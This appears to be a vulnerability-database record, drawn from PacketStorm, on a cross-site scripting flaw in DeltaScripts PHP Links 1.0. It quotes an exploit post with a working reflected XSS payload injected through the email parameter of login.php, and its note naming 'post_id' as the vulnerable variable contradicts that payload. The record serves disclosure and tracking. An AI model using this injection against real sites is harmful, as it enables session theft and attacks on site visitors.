ID

VAR-E-201001-0481


TITLE

DeltaScripts PHP Links 1.0 Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 84967

DESCRIPTION

DeltaScripts PHP Links version 1.0 suffers from a cross site scripting vulnerability.

Trust: 0.5

sources: PACKETSTORM: 84967

AFFECTED PRODUCTS

vendor:deltascriptsmodel:php linksscope:eqversion:1.0

Trust: 0.5

sources: PACKETSTORM: 84967

EXPLOIT

##########################################################

H A C K - T E C H E X P L O I T S - by Crux

##########################################################

[+] Exploit Title: DeltaScripts PHP Links XSS Vulnerability
[+] Date: January 09 2010
[+] Author: Crux [mail:cruxtheking@live.com]
[+] Software Link: http://www.deltascripts.com/phplinks/
[+] Version: 1.0
[+] Tested on: ALL OS
[+] Dork: NO NO NO!

[ Vulnerable File ]

login.php
(The post variable, post_id)

[ EXPLOIT ]

/login.php?email=%F6"+onmouseover=prompt(31337)//&submit=Login&forgotten=1

[ DEMO ]
http://sitename.com/phplinks/login.php?email=%F6"+onmouseover=prompt(31337)//&submit=Login&forgotten=1

[+] Greetz to the peeps at hack-tech.com.

##########################################################

________________________________
Windows Live: Make it easier for your friends to see what you’re up to on Facebook.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_2:092009>

Trust: 0.5

sources: PACKETSTORM: 84967

EXPLOIT HASH

LOCAL

SOURCE

md5: f6304595ade38485f5dfda51114a18a4
sha-1: afac36f9a6cc8ce999f1a737e3da57d168e44675
sha-256: dc085ff41962d3d60800bad616b6edee9b9e3c88c5c07629fe2d7c3b9330ac74
md5: f6304595ade38485f5dfda51114a18a4

Trust: 0.5

sources: PACKETSTORM: 84967

EXPLOIT LANGUAGE

php

Trust: 0.5

sources: PACKETSTORM: 84967

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 84967

TYPE

xss

Trust: 0.5

sources: PACKETSTORM: 84967

TAGS

tag:exploit

Trust: 0.5

tag:php

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 84967

CREDITS

Crux

Trust: 0.5

sources: PACKETSTORM: 84967

EXTERNAL IDS

db:PACKETSTORMid:84967

Trust: 0.5

sources: PACKETSTORM: 84967

SOURCES

db:PACKETSTORMid:84967

LAST UPDATE DATE

2022-07-27T09:45:50.133000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:84967date:2010-01-11T18:31:00